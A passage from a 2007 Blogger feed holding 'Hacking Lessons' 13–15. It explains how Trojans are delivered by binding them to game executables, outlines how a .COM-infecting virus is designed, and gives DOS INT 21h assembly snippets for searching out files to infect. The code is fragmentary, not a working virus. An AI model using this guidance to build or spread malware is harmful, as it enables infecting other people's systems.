src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-7965080484985920092</id><published>2007-04-07T01:04:00.000+05:30</published><updated>2007-05-26T11:57:52.151+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Basics of Virus Programming'/><title type='text'>HACKING LESSON 13</title><content type='html'>&lt;p class="MsoNormal" style=""&gt;&lt;span style=""&gt;THE TROJAN “HORSE”&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:Verdana;color:black;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;span style=";font-family:Arial;color:black;"  &gt;Trojan’s are the most dangerous of all types of attacks.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:Arial;color:black;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;What are Trojans?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:Arial;color:black;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;Trojans are small programs through which the hacker gain control over your system. Although, most of the Trojans are detected by anti virus programs but the frequency with which these programs are written is far more than the anti virus updating system.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:Arial;color:black;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;span style="font-family:Arial;"&gt;Some common features with Trojans are as follows:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;• Capturing screenshots of your computer.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;• Recording key strokes and sending files to the hacker&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;• Giving full Access to all your drives and files.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;• Ability to use your computer to do other hacking related activities.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Every Trojan has two parts a Client and a Server. In order to gain access, the server file must be installed in the target computer. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;How this is done?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt;Initially this was done using a simple email. The hacker will send you an email with some sort of attachment (the Server File). The matter of that mail will make you open that attachment, when you double click on it you will see nothing but in the background the server file gets installed on your system.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Now, all the hacker has to do is just use the client file to connect to your system.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;But this method became so popular that the hacker has to search for some other technique to achieve the above objective.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;How many of you have played small computer games such as “shooting bird”, “catching butterflies”, “slapping some face”, etc&lt;/span&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Now, in this technique the hacker joins two exe files into a single file i.e. the server file + the game file.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;In this case when you open the attachment you will see the game but at the same time the server also gets installed on your system.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;color:red;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;This is just one way; there are many other ways to achieve this objective. So always be careful whenever you are opening an unknown attachment, or while visiting unsafe websites, while chatting, etc.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;        &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;color:red;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;span style="font-family:Arial;"&gt;A very famous Trojan Example is NETBUS; the details are posted in “Tool of the Day” section.&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;span style=";font-family:Arial;color:black;"  &gt;&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-7965080484985920092?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/7965080484985920092/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=7965080484985920092' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/7965080484985920092'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/7965080484985920092'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/hacking-lesson-13.html' title='HACKING LESSON 13'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-9047623681326937944</id><published>2007-04-07T01:00:00.000+05:30</published><updated>2007-05-26T11:58:09.030+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Basics of Virus Programming'/><title type='text'>HACKING LESSON 14</title><content type='html'>&lt;p class="MsoNormal"&gt;&lt;u&gt;&lt;span style=";font-family:Arial;font-size:14;"  &gt;V I R U S &lt;/span&gt;&lt;/u&gt;&lt;span style=";font-family:Arial;font-size:14;"  &gt;–       &lt;u&gt;Vital Information &amp; Resources Under Siege&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;Composition of Virus&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt; – Every Computer virus must have two parts &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;First&lt;/span&gt;&lt;/b&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt; &lt;/span&gt;&lt;span style="font-family:Arial;"&gt;&lt;span style=""&gt;               &lt;/span&gt;- A Search Routine&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;Second&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt;&lt;span style=""&gt;         &lt;/span&gt;- Routine to copy itself &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;The &lt;b style=""&gt;search routine&lt;/b&gt; searches for the targets on the disk in order to spread infection i.e. &lt;span style="color:blue;"&gt;this routine decides what to infect&lt;/span&gt;?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;span style=""&gt;&lt;/span&gt;The &lt;b style=""&gt;copy routine&lt;/b&gt; copies itself to the result of the search routine. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;The size of the Virus depends on the target and the speed to spread infection&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Viruses are written in &lt;b style=""&gt;&lt;span style=""&gt;assembly language &lt;/span&gt;&lt;/b&gt;&lt;span style=""&gt;because it provides all the necessary functionality to the program for jumping from one target to other. It does not mean that one cannot code a virus in High level languages such as C, Pascal, Basic, etc., but assembly language provides control over computer resources easily and hence we can use them our way.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;i style=""&gt;&lt;span style=";font-family:Arial;color:red;"  &gt;Note: If you are not familiar with Assembly Language instructions then this and the next two or three articles are of no use for you.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;i style=""&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/i&gt;&lt;span style="font-family:Arial;"&gt;The aim of this article is to just give you a feel of virus programming; No effort will be made to teach anyone full fledged virus programming.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;In order to explain the process we are taking the example of a very simple virus which infects .COM files.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;In order to understand the programming we must first learn some of the basic DOS functions i.e. how DOS works?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Open the DOS prompt and type anything in it which does not exist for e.g.: type “vedjhwe” you will get the following result “‘yedjhwe’ is not recognized as an internal or external command, operable program or batch file”.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;This means that whenever a user enters a name of the program at the DOS prompt, DOS begins to look for that file - first for a “.com” extension (Command file), then “.exe” extension (Operable Program), then “.bat” extension (Batch File) and if it does not found any of these then it displays the above message OR “Bad Command or file name”.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;In order to execute a COM file DOS first check whether there is enough memory to execute the program and if there is memory available DOS loads the program. Also, DOS records how much memory it is giving to the program so there isn’t any memory clash. Next DOS builds PSP at the offset 0 (Program Segment Prefix – a block of memory). Finally, the program is loaded into the memory just above the PSP, starting at the offset 100H. Some of the registers in the CPU must be set to a predetermined value for the COM program to run properly. After all this initial work is done DOS passes the control to the program. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;          &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Designing the Virus---------&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt;In order for a virus to reside inside a COM file, it must get the controls passed to its own code. So, the easiest way to take control of the program will be at the very beginning of the program, because after the program is executed it’s very difficult to gain control over it. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;To gain control over the program the virus must replace the first few bytes in the COM file with a jump instruction to the virus code, which can be attached at the end of the COM file. So, when the COM file is executed, it jumps to the virus code, which in turn starts looking for more similar type of files in order to spread the infection. When the virus is ready, it returns control to the host program (COM Program), restore the initial few bytes which it replaced, and then jump back to offset 100 Hex, where the original program begins.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;      &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;color:red;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;………………..will continue&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-9047623681326937944?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/9047623681326937944/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=9047623681326937944' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/9047623681326937944'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/9047623681326937944'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/hacking-lesson-14.html' title='HACKING LESSON 14'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-6901744821388719532</id><published>2007-04-07T00:58:00.000+05:30</published><updated>2007-05-26T11:57:07.855+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Basics of Virus Programming'/><title type='text'>HACKING LESSON 15</title><content type='html'>&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b&gt;&lt;span style="font-family:Arial;"&gt;The Search Mechanism-&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;In order to write the search mechanism for the virus (to search files for infecting) we must first understand the following things…&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;        &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;The information about every file on disk is stored in two areas on disk, known as the &lt;span style=""&gt;directory &lt;/span&gt;and the &lt;span style=""&gt;File Allocation Table (FAT)&lt;/span&gt;. The directory contains a 32 byte &lt;span style=""&gt;file descriptor &lt;/span&gt;record for each file -&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;File Descriptor contains&lt;/span&gt;&lt;span style="font-family:Arial;"&gt; - the file’s name, size, date and time of creation, &amp; the file &lt;span style=""&gt;attribute&lt;/span&gt;.&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;The FAT &lt;/span&gt;&lt;span style="font-family:Arial;"&gt;is a map of the entire disk, which simply informs the operating system which areas are occupied by which files.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Let us consider a simple example of calling a file and opening it for reading purpose only – &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;            &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;mov  ds,SEG FNAME &lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;mov  dx,OFFSET FNAME&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;xor &lt;span style=""&gt;   &lt;/span&gt;al,al &lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;mov  ah,3DH &lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;int &lt;span style=""&gt;     &lt;/span&gt;21H &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;        &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;DOS is told what to do using &lt;b style=""&gt;I&lt;span style=""&gt;nterrupt Service Routines &lt;/span&gt;(&lt;span style=""&gt;ISR&lt;/span&gt;).&lt;/b&gt; Interrupt 21H is the main DOS ISR&lt;o:p&gt;&lt;/o:p&gt;. This program tells DOS to locate the file (FNAME) and prepare it for reading into memory. The “int 21H” instruction transfers control to DOS to perform the task. When DOS is finished opening the file, control returns to the statement immediately after the “int 21H”. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;The register &lt;b&gt;ah &lt;/b&gt;contains the function number, which tells DOS what to do. &lt;b&gt;ds:dx &lt;/b&gt;register pair is used to point to the memory location where the name of the file to open is stored. The register &lt;b&gt;al &lt;/b&gt;tells DOS to open the file for reading only. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;To write a routine which searches for other files to infect, the DOS &lt;span style=""&gt;search &lt;/span&gt;functions are used (DOS has a pair of searching functions incorporated into it called &lt;span style=""&gt;Search First &lt;/span&gt;and &lt;span style=""&gt;Search Next). In order to search for a specific file in a particular directory &lt;/span&gt;an &lt;span style=""&gt;ASCIIZ &lt;/span&gt;string is used. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;      &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;For example:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;DB ’\system\hyper.*’,0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;        &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;This string will set up the search function to search for all files with the name &lt;span style=""&gt;hyper&lt;/span&gt;, and any possible extent, in the subdirectory named &lt;span style=""&gt;system&lt;/span&gt;. DOS might find files like &lt;b style=""&gt;&lt;span style=""&gt;hyper.c&lt;/span&gt;&lt;/b&gt;, &lt;b style=""&gt;&lt;span style=""&gt;hyper.jpg&lt;/span&gt;&lt;/b&gt;, &lt;b style=""&gt;&lt;span style=""&gt;hyper.exe&lt;/span&gt;&lt;/b&gt;, etc. After setting up this ASCIIZ string, one must perform the following steps –&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;1).Set the registers &lt;b&gt;ds &lt;/b&gt;and &lt;b&gt;dx &lt;/b&gt;up to the segment and offset of this ASCIIZ string in memory. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;2).Register &lt;b&gt;cl &lt;/b&gt;must be set to a file attribute mask which will tell DOS which file attributes to allow in the search, and which to exclude. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;3).Finally, to call the Search First function, one must set &lt;b&gt;ah &lt;/b&gt;= 4E Hex. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;If the search first function is successful, it returns with register &lt;b&gt;al &lt;/b&gt;= 0 and it formats 43 bytes of data in the &lt;span style=""&gt;Disk Transfer Area&lt;/span&gt;, or &lt;span style=""&gt;DTA&lt;/span&gt;. This data provides the name of the file, its attribute, its size and its date of creation to the search program. If the search cannot find a matching file, DOS returns &lt;b&gt;al &lt;/b&gt;non-zero, with no data in the DTA. Since the calling program knows the address of the DTA, it can go examine that area for the file information after DOS has stored it there.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;Example:&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt; Suppose we want to find all the files in the currently logged directory with an extent “COM”, including hidden and system files. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;                  &lt;p class="MsoNormal" style="text-align: justify; text-indent: 0.5in;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;SRCH_FIRST:&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;mov dx,OFFSET COMFILE&lt;span style=""&gt;          &lt;/span&gt;;set offset of asciiz string&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;mov cl,00000110B &lt;span style=""&gt;                         &lt;/span&gt;;set hidden and system attributes&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;mov ah,4EH &lt;span style=""&gt;                                    &lt;/span&gt;;search first function&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;int &lt;span style=""&gt;   &lt;/span&gt;21H &lt;span style=""&gt;                                           &lt;/span&gt;;call DOS&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;or &lt;span style=""&gt;    &lt;/span&gt;al,al &lt;span style=""&gt;                                           &lt;/span&gt;;check to see if successful&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;jnz &lt;span style=""&gt;   &lt;/span&gt;NOFILE &lt;span style=""&gt;                                   &lt;/span&gt;;go handle no file found condition&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;        FOUND: &lt;span style=""&gt;                                  &lt;/span&gt;;come here if file found&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;COMFILE &lt;span style=""&gt;                 &lt;/span&gt;DB ’*.COM’,0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;                  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;In comparison with the Search First function, the Search Next is easy, because all of the data has already been set up by the Search First. Just set &lt;b&gt;ah &lt;/b&gt;= 4F hex and call DOS interrupt 21H:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;mov ah,4FH &lt;span style=""&gt;                         &lt;/span&gt;;search next function&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;int 21H &lt;span style=""&gt;                      &lt;/span&gt;            ;call DOS&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;or al,al &lt;span style=""&gt;                                   &lt;/span&gt;;see if a file was found&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;jnz NOFILE &lt;span style=""&gt;                          &lt;/span&gt;;no, go handle no file found&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;FOUND2: &lt;span style=""&gt;                             &lt;/span&gt;;else process the file&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;If another file is found the data in the DTA will be updated with the new file name, and &lt;b&gt;ah &lt;/b&gt;will be set to zero on return. If no more matches are found, DOS will set &lt;b&gt;ah &lt;/b&gt;to something besides zero on return. One must be careful here so the data in the DTA is not altered between the call to Search First and later calls to Search Next, because the Search Next expects the data from the last search call to be there.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;color:red;"  &gt;………………will continue&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-6901744821388719532?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/6901744821388719532/comments/default' title='Post Comments'/><link rel='replies' 